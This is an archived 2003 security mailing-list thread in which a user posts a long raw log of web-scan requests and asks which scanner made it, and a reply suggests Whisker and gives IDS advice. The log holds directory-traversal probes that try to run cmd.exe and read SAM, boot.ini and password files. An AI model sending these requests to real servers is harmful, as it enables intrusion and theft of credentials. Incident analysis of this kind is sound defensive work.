Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > incidents > 03 > 040980.html (Request Expert securityfocus.com Support)

RE: Does anyone recognize the scanner that causes this pattern ?

From: Jerry Shenk <jshenk(at)decommunications.com>
Date: Mon Apr 07 2003 - 11:34:02 EDT


Replying to you and the list....I can never seem to get postings on the list anymore....not sure why.

That's quite a list of hits. Whisker would be one (among many) tools that could generate a pattern like that. It doesn't look like a worm to me. Seems like somebody has specifically targeted you...or is auditing a neighboring web server and mis-typed an IP address;) It looks like a scanning tool that's just looking for all kinds of vulnerabilities. Are they all from the same source? Do you have any kind of anomaly-based IDS like SHADOW that would be collecting all headers? If so, you could look for the source IP address. If not, you could hook up something on the outside and watch for that IP address.

-----Original Message-----
From: dean@packethunter.com [mailto:dean@packethunter.com] Sent: Sunday, April 06, 2003 3:24 PM
To: incidents@securityfocus.com
Subject: Does anyone recognize the scanner that causes this pattern ?

I recently logged a fairly extensive web scan and am trying to ID the tool 

responsible. Has anyone seen this particular pattern before ?  HEAD

/.html/............*/config.sys HTTP/1.0\x0a\x0a HEAD

HTTP/1.0\x0a\x0a HEAD /../boot.ini HTTP/1.0\x0a\x0a HEAD /../config.sys
HTTP/1.0\x0a\x0a HEAD /a.asp/..../..../winnt/repair/sam HTTP/1.0\x0a\x0a
HEAD /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0\x0a\x0a HEAD /cgi
HTTP/1.0\x0a\x0a HEAD /cgi/ HTTP/1.0\x0a\x0a HEAD /cgibin HTTP/1.0\x0a\x0a HEAD /cgi-bin HTTP/1.0\x0a\x0a HEAD /cgibin/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/ 
HTTP/1.0\x0a\x0a HEAD /cgi-bin/../../../../winnt/system32/cmd.exe
HTTP/1.0\x0a\x0a HEAD /cgi-bin/......../winnt/system32/cmd.exe
HTTP/1.0\x0a\x0a HEAD /cgi-bin/............winntsystem32cmd.exe?/c+dir+c:
HTTP/1.0\x0a\x0a HEAD /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\x0a\x0a HEAD /cgi-bin/sam._ HTTP/1.0\x0a\x0a HEAD /cgi-win
HTTP/1.0\x0a\x0a HEAD /cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /doc
HTTP/1.0\x0a\x0a HEAD /iisadmin HTTP/1.0\x0a\x0a HEAD /iisadmin/
HTTP/1.0\x0a\x0a HEAD /iisamples/Sdk HTTP/1.0\x0a\x0a HEAD /iissamples
HTTP/1.0\x0a\x0a HEAD /iissamples/Default HTTP/1.0\x0a\x0a HEAD

/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /scripts 
HTTP/1.0\x0a\x0a HEAD /scripts/ HTTP/1.0\x0a\x0a HEAD /scripts/*
HTTP/1.0\x0a\x0a HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir
HTTP/1.0 \x0a\x0a HEAD

/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /scripts/../../cmd.exe HTTP/1.0\x0a\x0a HEAD
/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/scripts/..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD
/scripts/........../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/scripts/........../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/scripts/cmd.exe HTTP/1.0\x0a\x0a HEAD /scripts/cmd.exe?/c+dir%20c: 
HTTP/1.0\x0a\x0a HEAD /scripts/iisadmin/default.htm HTTP/1.0\x0a\x0a HEAD

/scripts/iisadmin/samples HTTP/1.0\x0a\x0a HEAD /scripts/iisadmin/tools


HTTP/1.0\x0a\x0a HEAD /scripts/perl HTTP/1.0\x0a\x0a HEAD /scripts/samples
HTTP/1.0\x0a\x0a HEAD /scripts/tools HTTP/1.0\x0a\x0a HEAD /search
HTTP/1.0\x0a\x0a HEAD /server-info HTTP/1.0\x0a\x0a HEAD /server-status
HTTP/1.0\x0a\x0a HEAD /_AuthChangeUrl HTTP/1.0\x0a\x0a HEAD /_AuthChangeUrl?
HTTP/1.0\x0a\x0a HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_mem_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD
/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_private HTTP/1.0\x0a\x0a HEAD /_vti_bin/_vti_adm HTTP/1.0\x0a\x0a HEAD
HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/_vti_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD
/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/cgi-bin/_vti_cnf HTTP/1.0\x0a\x0a HEAD /_vti_inf.html HTTP/1.0\x0a\x0a HEAD
/_vti_log HTTP/1.0\x0a\x0a HEAD /_vti_pvt HTTP/1.0\x0a\x0a HEAD /_vti_pvt/
HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0\x0a\x0a HEAD
/_vti_txt HTTP/1.0\x0a\x0a HEAD /abczxv.htw HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\x0a\x0a HEAD /_vti_adm/admin.dll HTTP/1.0\x0a\x0a HEAD
/scripts/admin.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /admisapi/ HTTP/1.0\x0a\x0a HEAD
/iissamples/exair/search/advsearch.asp HTTP/1.0\x0a\x0a HEAD
2Fetc&dispsize=640&start=0 HTTP/1.0\x0a\x0a HEAD /cgi-bin/alibaba.pl HTTP/1.0\x0a\x0a HEAD /app.cfm HTTP/1.0\x0a\x0a HEAD /cgi-dos/args.bat HTTP/1.0\x0a\x0a HEAD /cgi-dos/args.cmd HTTP/1.0\x0a\x0a HEAD
/_vti_bin/_vti_aut/author.dll HTTP/1.0\x0a\x0a HEAD /_vti_pvt/author.log
HTTP/1.0\x0a\x0a HEAD /_vti_pvt/authors.pwd HTTP/1.0\x0a\x0a HEAD
/autoexec.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/bb-hostsvc.sh HTTP/1.0\x0a\x0a
HEAD /scripts/bbs.pl%3F+.htr HTTP/1.0\x0a\x0a HEAD /bdir.htr 
HTTP/1.0\x0a\x0a HEAD /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\x0a\x0a
HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
\x0a\x0a HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:
HTTP/1.0 \x0a\x0a HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\x0a\x0a HEAD
/bin/scripts/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/common/browser.inc HTTP/1.0\x0a\x0a HEAD /scripts/c32web.exe
HTTP/1.0\x0a\x0a HEAD /carbo.dll HTTP/1.0\x0a\x0a HEAD
/scripts/Carello/Carello.dll HTTP/1.0\x0a\x0a HEAD /scripts/cart32.exe
HTTP/1.0\x0a\x0a HEAD /scripts/cart32.exe/cart32clientlist HTTP/1.0\x0a\x0a HEAD /catalog.nsf HTTP/1.0\x0a\x0a HEAD /catalog.nsf/ HTTP/1.0\x0a\x0a HEAD
/AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/ceilidh.exe HTTP/1.0\x0a\x0a HEAD
/cfcache.map HTTP/1.0\x0a\x0a HEAD /cfdocs/cfmlsyntaxcheck.cfm
HTTP/1.0\x0a\x0a HEAD /cfusion/database/cfsnippets.mdb HTTP/1.0\x0a\x0a HEAD
/scripts/cgimail.exe HTTP/1.0\x0a\x0a HEAD /scripts/CGImail.exe
HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgitest.exe HTTP/1.0\x0a\x0a HEAD
/scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\x0a\x0a HEAD 
HTTP/1.0\x0a\x0a HEAD /msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:

Do you need help?X

HTTP/1.0 \x0a\x0a HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir
HTTP/1.0\x0a\x0a HEAD


/msadc/..../..../..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a
HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD
/msadc/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /nofile.pl HTTP/1.0\x0a\x0a HEAD
/_vti_bin/shtml.dll/nosuch.htm HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cfdocs/expeval/openfile.cfm HTTP/1.0\x0a\x0a HEAD
/Admin_files/order.log HTTP/1.0\x0a\x0a HEAD /_private/orders.txt
HTTP/1.0\x0a\x0a HEAD /config/orders.txt HTTP/1.0\x0a\x0a HEAD
/wwwboard/passwd.txt HTTP/1.0\x0a\x0a HEAD /pbserver/ HTTP/1.0\x0a\x0a HEAD 
HTTP/1.0\x0a\x0a HEAD /cgi-bin/scripts/perl.exe HTTP/1.0\x0a\x0a HEAD

/cgi-win/perl.exe HTTP/1.0\x0a\x0a HEAD /ows-bin/perlidlc.bat?&dir
HTTP/1.0\x0a\x0a HEAD /scripts/pfieffer.bat HTTP/1.0\x0a\x0a HEAD
/scripts/pfieffer.cmd HTTP/1.0\x0a\x0a HEAD /cgi-bin/post32.exe
HTTP/1.0\x0a\x0a HEAD /scripts/postinfo.asp HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ppdscgi.exe HTTP/1.0\x0a\x0a HEAD /private HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /iissamples/issamples/query.asp HTTP/1.0\x0a\x0a HEAD
/samples/search/queryhit.htm HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /_private/register.txt HTTP/1.0\x0a\x0a HEAD
/_private/registrations.txt HTTP/1.0\x0a\x0a HEAD /scripts/repost.asp
HTTP/1.0\x0a\x0a HEAD /bin/scripts/openvendor/gnete/RetrievePNBody.asp HTTP/1.0\x0a\x0a HEAD /cgi-bin/rguest.exe HTTP/1.0\x0a\x0a HEAD
/scripts/rguest.exe HTTP/1.0\x0a\x0a HEAD /robots.txt HTTP/1.0\x0a\x0a HEAD
/cfdocs/root.cfm HTTP/1.0\x0a\x0a HEAD /scripts/root.exe?/c+dir%20c:
HTTP/1.0\x0a\x0a HEAD /sample.asp HTTP/1.0\x0a\x0a HEAD
/IISSAMPLES/ExAir/Search/search.asp HTTP/1.0\x0a\x0a HEAD /search.dll
HTTP/1.0\x0a\x0a HEAD /cgi-bin/search97.vts HTTP/1.0\x0a\x0a HEAD
/search97.vts HTTP/1.0\x0a\x0a HEAD /cfdocs/expeval/sendmail.cfm
HTTP/1.0\x0a\x0a HEAD /_vti_pvt/service.grp HTTP/1.0\x0a\x0a HEAD
/cfdocs/expelval/sendmail.cfm HTTP/1.0\x0a\x0a HEAD /_vti_pvt/service.pwd 
HTTP/1.0\x0a\x0a HEAD /servlet/SessionServlet HTTP/1.0\x0a\x0a HEAD

/cgi-bin/shop.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/shopper.cgi
HTTP/1.0\x0a\x0a HEAD /_private/shopping_cart.mdb HTTP/1.0\x0a\x0a HEAD
/cgi-bin/c32web.exe/ShowAdminDir HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.dll HTTP/1.0\x0a\x0a HEAD
/_vti_pvt/shtml.dll HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.exe
HTTP/1.0\x0a\x0a HEAD /_vti_pvt/shtml.exe HTTP/1.0\x0a\x0a HEAD
/ex/jsp/simple.jsp. HTTP/1.0\x0a\x0a HEAD /adsamples/config/site.csc
HTTP/1.0\x0a\x0a HEAD /scripts/slxweb.dll HTTP/1.0\x0a\x0a HEAD /smdata.dat HTTP/1.0\x0a\x0a HEAD /cfusion/database/smpolicy.mdb HTTP/1.0\x0a\x0a HEAD
/cgi-bin/snorkerz.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/snorkerz.cmd 
HTTP/1.0\x0a\x0a HEAD /cfdocs/exampleapp/docs/sourcewindow.cfm
HTTP/1.0\x0a\x0a HEAD /srchadm HTTP/1.0\x0a\x0a HEAD /cgi-bin/statsconfig.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/test.bat HTTP/1.0\x0a\x0a HEAD

/cgi-bin/test.cgi HTTP/1.0\x0a\x0a HEAD /today.nsf HTTP/1.0\x0a\x0a HEAD
/tree.dat HTTP/1.0\x0a\x0a HEAD /cgi-bin/tst.bat HTTP/1.0\x0a\x0a HEAD
/admin/ HTTP/1.0\x0a\x0a HEAD /administrator/ HTTP/1.0\x0a\x0a HEAD /bbs/ 
HTTP/1.0\x0a\x0a HEAD /bbs/admin/ HTTP/1.0\x0a\x0a HEAD /bbs/admin/config/
HTTP/1.0\x0a\x0a HEAD /bbs/data/ HTTP/1.0\x0a\x0a HEAD /bbs/db/
HTTP/1.0\x0a\x0a HEAD /bbs/include/ HTTP/1.0\x0a\x0a HEAD /cache-stats/
HTTP/1.0\x0a\x0a HEAD /card/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/admin/admin
HTTP/1.0\x0a\x0a HEAD /cgi-bin/Board/db/ HTTP/1.0\x0a\x0a HEAD

/cgi-bin/campas HTTP/1.0\x0a\x0a HEAD /cgi-bin/counterfiglet/nc/f 
HTTP/1.0\x0a\x0a HEAD /cgi-bin/jj HTTP/1.0\x0a\x0a HEAD /cgi-bin/perl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/query HTTP/1.0\x0a\x0a HEAD /cgi-bin/ssi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/wrap HTTP/1.0\x0a\x0a HEAD /config/
HTTP/1.0\x0a\x0a HEAD /customer/ HTTP/1.0\x0a\x0a HEAD /data/
HTTP/1.0\x0a\x0a HEAD /database/ HTTP/1.0\x0a\x0a HEAD /databases/
HTTP/1.0\x0a\x0a HEAD /db/ HTTP/1.0\x0a\x0a HEAD /dbase/ HTTP/1.0\x0a\x0a
HEAD /deny/ HTTP/1.0\x0a\x0a HEAD /devel/ HTTP/1.0\x0a\x0a HEAD /docs/ 
HTTP/1.0\x0a\x0a HEAD /document/ HTTP/1.0\x0a\x0a HEAD /documents/
HTTP/1.0\x0a\x0a HEAD /down/ HTTP/1.0\x0a\x0a HEAD /download/
HTTP/1.0\x0a\x0a HEAD /downloads/ HTTP/1.0\x0a\x0a HEAD /example/
HTTP/1.0\x0a\x0a HEAD /exec/show/config/cr HTTP/1.0\x0a\x0a HEAD /file/
HTTP/1.0\x0a\x0a HEAD /files/ HTTP/1.0\x0a\x0a HEAD /forum/ HTTP/1.0\x0a\x0a
HEAD /ftp/ HTTP/1.0\x0a\x0a HEAD /girl/ HTTP/1.0\x0a\x0a HEAD /girls/ HTTP/1.0\x0a\x0a HEAD /hire/ HTTP/1.0\x0a\x0a HEAD /htdocs/ HTTP/1.0\x0a\x0a HEAD /idea/ HTTP/1.0\x0a\x0a HEAD /ideas/ HTTP/1.0\x0a\x0a HEAD /image/ HTTP/1.0\x0a\x0a HEAD /images/ HTTP/1.0\x0a\x0a HEAD /img/ HTTP/1.0\x0a\x0a 
HEAD /inc/ HTTP/1.0\x0a\x0a HEAD /include/ HTTP/1.0\x0a\x0a HEAD

/include/inc/ HTTP/1.0\x0a\x0a HEAD /includes/ HTTP/1.0\x0a\x0a HEAD
/incoming/ HTTP/1.0\x0a\x0a HEAD /install/ HTTP/1.0\x0a\x0a HEAD /lib/ 
HTTP/1.0\x0a\x0a HEAD /library/ HTTP/1.0\x0a\x0a HEAD /linux/

Do you need more help?X

HTTP/1.0\x0a\x0a HEAD /logging/ HTTP/1.0\x0a\x0a HEAD /manual/
HTTP/1.0\x0a\x0a HEAD /misc/ HTTP/1.0\x0a\x0a HEAD /mp3/ HTTP/1.0\x0a\x0a
HEAD /mrtg/ HTTP/1.0\x0a\x0a HEAD /msql/ HTTP/1.0\x0a\x0a HEAD /mysql/
HTTP/1.0\x0a\x0a HEAD /number/ HTTP/1.0\x0a\x0a HEAD /pds/ HTTP/1.0\x0a\x0a HEAD /perl HTTP/1.0\x0a\x0a HEAD /phone/ HTTP/1.0\x0a\x0a HEAD /php/ HTTP/1.0\x0a\x0a HEAD /php3/ HTTP/1.0\x0a\x0a HEAD /php4/ HTTP/1.0\x0a\x0a HEAD /porno/ HTTP/1.0\x0a\x0a HEAD /ports/ HTTP/1.0\x0a\x0a HEAD /private/ 
HTTP/1.0\x0a\x0a HEAD /program/ HTTP/1.0\x0a\x0a HEAD /programming/
HTTP/1.0\x0a\x0a HEAD /programs/ HTTP/1.0\x0a\x0a HEAD /public/
HTTP/1.0\x0a\x0a HEAD /secret/ HTTP/1.0\x0a\x0a HEAD /secrets/
HTTP/1.0\x0a\x0a HEAD /server_stats/ HTTP/1.0\x0a\x0a HEAD /server-info/
HTTP/1.0\x0a\x0a HEAD /server-status/ HTTP/1.0\x0a\x0a HEAD /set/
HTTP/1.0\x0a\x0a HEAD /setting/ HTTP/1.0\x0a\x0a HEAD /setup/
HTTP/1.0\x0a\x0a HEAD /sex/ HTTP/1.0\x0a\x0a HEAD /snmp/ HTTP/1.0\x0a\x0a
HEAD /source/ HTTP/1.0\x0a\x0a HEAD /sources/ HTTP/1.0\x0a\x0a HEAD /sql/ HTTP/1.0\x0a\x0a HEAD /stat/ HTTP/1.0\x0a\x0a HEAD /statistics/ HTTP/1.0\x0a\x0a HEAD /Stats/ HTTP/1.0\x0a\x0a HEAD /stats/ HTTP/1.0\x0a\x0a HEAD /telephone/ HTTP/1.0\x0a\x0a HEAD /temp/ HTTP/1.0\x0a\x0a HEAD
/temporary/ HTTP/1.0\x0a\x0a HEAD /test/ HTTP/1.0\x0a\x0a HEAD /tool/
HTTP/1.0\x0a\x0a HEAD /tools/ HTTP/1.0\x0a\x0a HEAD /usage/ HTTP/1.0\x0a\x0a HEAD /weblog/ HTTP/1.0\x0a\x0a HEAD /weblogs/ HTTP/1.0\x0a\x0a HEAD
/webstats/ HTTP/1.0\x0a\x0a HEAD /work/ HTTP/1.0\x0a\x0a HEAD /wstats/ 
HTTP/1.0\x0a\x0a HEAD /wwwlog/ HTTP/1.0\x0a\x0a HEAD /wwwstats/
HTTP/1.0\x0a\x0a HEAD /acid/ HTTP/1.0\x0a\x0a HEAD /acid/acid_main.php
HTTP/1.0\x0a\x0a HEAD /cgi-bin/ad.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/adcycle
HTTP/1.0\x0a\x0a HEAD /secret/secret/add-user.shmtl HTTP/1.0\x0a\x0a HEAD

/admin.php3?admin=anything HTTP/1.0\x0a\x0a HEAD /adpassword.txt
HTTP/1.0\x0a\x0a HEAD /cgi-bin/aglimpse HTTP/1.0\x0a\x0a HEAD
/cgi-bin/allmanage.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/allmanageup.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/amlite/amadmin.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/anacondaclip.pl?template=check HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/AT-generate.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/awl/auctionweaver.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/auktion.pl
HTTP/1.0\x0a\x0a HEAD /banners.php?op=Change HTTP/1.0\x0a\x0a HEAD
/cgi-bin/bb-hist.sh HTTP/1.0\x0a\x0a HEAD /cgi-bin/bbs_forum.cgi
HTTP/1.0\x0a\x0a HEAD /examples/applications/bboard/bboard_frames.html HTTP/1.0\x0a\x0a HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/bnbform.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/build.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/cached_feed.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/cachemgr.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/cal_make.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/calender.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/calender_admin.pl HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgiforum.pl HTTP/1.0\x0a\x0a HEAD
/manage/cgi/cgiproc HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgiwrap HTTP/1.0\x0a\x0a
HEAD /secret/secret/change-passwd.shtml HTTP/1.0\x0a\x0a HEAD
/cgi-bin/changepw.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/classifieds.cgi
HTTP/1.0\x0a\x0a HEAD
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
HTTP/1.0\x0a\x0a HEAD
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server HTTP/1.0
\x0a\x0a HEAD /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini HTTP/1.0 \x0a\x0a HEAD
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC HTTP/1.0 \x0a\x0a
HEAD /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 HTTP/1.0 
\x0a\x0a HEAD /servlet/com.livesoftware.jrun.plugins.jsp.JSP
HTTP/1.0\x0a\x0a HEAD /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
HTTP/1.0\x0a\x0a HEAD /servlet/com.unify.ewave.servletexec.UploadServlet
HTTP/1.0\x0a\x0a HEAD /cgi-bin/commerce.cgi?page=check HTTP/1.0\x0a\x0a HEAD

/forum/common.php HTTP/1.0\x0a\x0a HEAD /phorum/common.php HTTP/1.0\x0a\x0a 
HEAD /cgi-bin/Count.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/CrazyWWWBoard.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/csvform.pl HTTP/1.0\x0a\x0a HEAD

/cgi-bin/htgrep HTTP/1.0\x0a\x0a HEAD /cgi-bin/htmlscript HTTP/1.0\x0a\x0a
HEAD /cgi-bin/htsearch HTTP/1.0\x0a\x0a HEAD /cgi-bin/htsearch?config=aaa 
HTTP/1.0\x0a\x0a HEAD /index.html.bak HTTP/1.0\x0a\x0a HEAD /index.html~
HTTP/1.0\x0a\x0a HEAD /index.js%2570 HTTP/1.0\x0a\x0a HEAD /index.php.bak
HTTP/1.0\x0a\x0a HEAD /index.php~ HTTP/1.0\x0a\x0a HEAD

/index.php3?vhosts[test]= HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/lasso.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /ConsoleHelp/login.jsp HTTP/1.0\x0a\x0a HEAD
/login.jsp HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailfile.cgi HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailnews.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/mailto.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/man.sh HTTP/1.0\x0a\x0a
HEAD /manual.php HTTP/1.0\x0a\x0a HEAD /cgi-bin/mdma.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= HTTP/1.0\x0a\x0a HEAD
/class/mysql.class HTTP/1.0\x0a\x0a HEAD /names.nsf HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/news/news.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/nph-maillist.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/nph-publish
HTTP/1.0\x0a\x0a HEAD /cgi-bin/nph-test-cgi HTTP/1.0\x0a\x0a HEAD
/examples/jsp/num/numguess.js%70 HTTP/1.0\x0a\x0a HEAD /cgi-bin/pagelog.cgi 
HTTP/1.0\x0a\x0a HEAD /cgi-bin/pals-cgi HTTP/1.0\x0a\x0a HEAD

/cgi-bin/newsdesk.cgi?t=../pass.txt HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/phf HTTP/1.0\x0a\x0a HEAD /cgi-bin/phf.cgi HTTP/1.0\x0a\x0a HEAD
HEAD /cgi-bin/postings.cgi?
action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0 HTTP/1.0\x0a\x0a HEAD /cgi-bin/post-query HTTP/1.0\x0a\x0a HEAD
/cgi-bin/processit.pl HTTP/1.0\x0a\x0a HEAD /PSUser/PSCOErrPage.htm
HTTP/1.0\x0a\x0a HEAD /pservlet.html HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ipf/etc/gfw/ui/pwd.dat HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/responder.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/rpm_query HTTP/1.0\x0a\x0a HEAD /cgi-bin/rwwwshell.pl
HTTP/1.0\x0a\x0a HEAD /sawmill HTTP/1.0\x0a\x0a HEAD /scancfg.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/search.cgi?letter= HTTP/1.0\x0a\x0a HEAD
/cgi-bin/Search.pl HTTP/1.0\x0a\x0a HEAD /ROADS/cgi-bin/search.pl
HTTP/1.0\x0a\x0a HEAD /inc/sendmail.inc HTTP/1.0\x0a\x0a HEAD /setpasswd.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/simplestguest.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/simplestmail.cgi HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /site/eg/source.asp HTTP/1.0\x0a\x0a HEAD
/secret/secret/sql_tool.shtml HTTP/1.0\x0a\x0a HEAD
HEAD /stats.htm HTTP/1.0\x0a\x0a HEAD /stats.html HTTP/1.0\x0a\x0a HEAD
/stats.txt HTTP/1.0\x0a\x0a HEAD /scripts/submit.cgi HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/subscribe.pl HTTP/1.0\x0a\x0a HEAD
/subscribe.pl?test@test.com HTTP/1.0\x0a\x0a HEAD /survey HTTP/1.0\x0a\x0a
HEAD /cgi-bin/survey.cgi HTTP/1.0\x0a\x0a HEAD /technote/main.cgi/oops? board=FREE_BOARD&command=down_load&filename=/../../../main.cgi HTTP/1.0 \x0a\x0a HEAD /technote/print.cgi HTTP/1.0\x0a\x0a HEAD /test/test.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/test-cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/textcounter.pl HTTP/1.0\x0a\x0a HEAD
HTTP/1.0\x0a\x0a HEAD /cgi-bin/unlg1.1 HTTP/1.0\x0a\x0a HEAD
/cgi-bin/unlg1.2 HTTP/1.0\x0a\x0a HEAD /cgi-bin/upload_file.pl
HTTP/1.0\x0a\x0a HEAD /user.php&op=saveuser HTTP/1.0\x0a\x0a HEAD
/cgi-auth/userreg.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/ustorekeeper.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/view_page.html HTTP/1.0\x0a\x0a HEAD
/cgi-bin/view-source HTTP/1.0\x0a\x0a HEAD /search97cgi/vtopic
HTTP/1.0\x0a\x0a HEAD /cgi-bin/w3-msql HTTP/1.0\x0a\x0a HEAD
/cgi-bin/wais.pl HTTP/1.0\x0a\x0a HEAD /way-board/way-board.cgi
HTTP/1.0\x0a\x0a HEAD /webaccess.htm HTTP/1.0\x0a\x0a HEAD
/cgi-bin/webdata.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdist.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdriver HTTP/1.0\x0a\x0a HEAD
/cgi-bin/webgais HTTP/1.0\x0a\x0a HEAD //WEB-INF/ HTTP/1.0\x0a\x0a HEAD
HEAD /cgi-bin/websendmail HTTP/1.0\x0a\x0a HEAD /cgi-bin/webspirs.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webwho.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/scripts/whois.cgi?action=load&whois=check HTTP/1.0\x0a\x0a HEAD 
